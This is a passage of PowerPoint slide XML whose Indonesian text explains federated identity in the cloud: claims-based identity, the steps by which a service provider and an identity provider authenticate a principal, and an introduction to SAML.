              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>interoperabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>federasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terminologinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kerberos SSO:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SP). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IdP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semacam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh IdP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IdP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IdP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akunnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh IdP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11232503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Bahasa Markup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>federasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Security Assertion Markup Language (SAML)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) SAML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
